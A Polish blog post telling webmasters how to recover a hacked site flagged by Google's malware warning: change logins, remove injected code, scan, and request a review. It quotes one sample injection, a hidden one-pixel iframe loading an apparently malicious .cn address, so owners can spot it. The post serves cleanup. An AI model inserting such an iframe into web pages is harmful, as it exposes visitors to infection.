Czasami zdarza się, że próbując wejść poprzez wyszukiwarkę na naszą stronę widzimy nagle taki oto komunikat na stronie
Czym to zostało spowodowane?
Taka sytuacja związana jest z faktem, że ktoś się włamał się na nasz serwer u umieścił na stronie złośliwy kod. Z reguły został on umieszczany w pliku index.html/index.php i wygląda np. tak <iframe src=”http://bestlotron.cn/in.cgi?cocacola60″ width=1 height=1 style=”visibility: hidden”></iframe> – lub jest to jakiś javascript. Taki kod znajduje się on zazwyczaj zaraz za znacznikiem <body> lub przed </body> pliku HTML, w przypadku pliku PHP często na końcu pliku .
Google, dbając o bezpieczeństwo innych użytkowników Internetu poprzez wyświetlenie tego komunikatu zwraca im uwagę na to, że wejście na stronę „odbędzie” się na wyraźne „życzenie” internauty, ponieważ istnieje duże ryzyko zainfekowania komputera osoby, która będzie próbowała wejść, mimo ostrzeżenia, na taką stronę.
Oczywiście, nie oznacza to, że nasza strona już zawsze zostanie „napiętnowana”. Należy szybko sprawę wyjaśnić, i w tym celu:
1) W pierwszej kolejności – należy zmienić dane logowania do serwera i do strony; jeżeli są one zapisane w FTPie – skasuj je.
2) następnie należy usunąć ze strony złośliwy kod
3) Przeskanować komputer i pliki na serwerze dobrym programem antywirusowym
4) następnie należy się zalogować do Narzędzi dla Webmasterów, dodać swoją witrynę, zweryfikować ją – i kliknąć w link, znajdujący się po lewej stronie, o powtórnym rozpatrzeniu strony. Z listy należy wybrać adres zainfekowanej strony (jak mamy zgłoszonych kilka witryn w Narzędziach), napisać KRÓTKO po polsku (nie lać wody) co się stało, razem z informacją, że złośliwy kod został już usunięty ze strony – i … po wysłaniu wniosku cierpliwie poczekać – z reguły do 24 godzin strona powinna być już dostępna , o ile zostały z niej usunięte wszystkie złośliwe kody, jakie zostały dopisane w wyniku włamania do kodu źródłowego naszej witryny.
Warto wiedzieć, że pod adresem http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site= (po znaku równości wpisujemy adres zainfekowanej witryny), można na bieżąco sprawdzać, czy nasza strona jest czysta, kiedy została ostatnio zainfekowana itp. Zachęcam do wpisania adresu swojej witryny i przetestowania 🙂
A gdy zweryfikowanie w narzędziach Google dla webmasterów jest niemożliwe, należy użyć http://stopbadware.org/home/reportsearch, po wyszukaniu domeny link „Request an independent review of partners’ findings”.
Bardzo pomocny artykul, dziekuje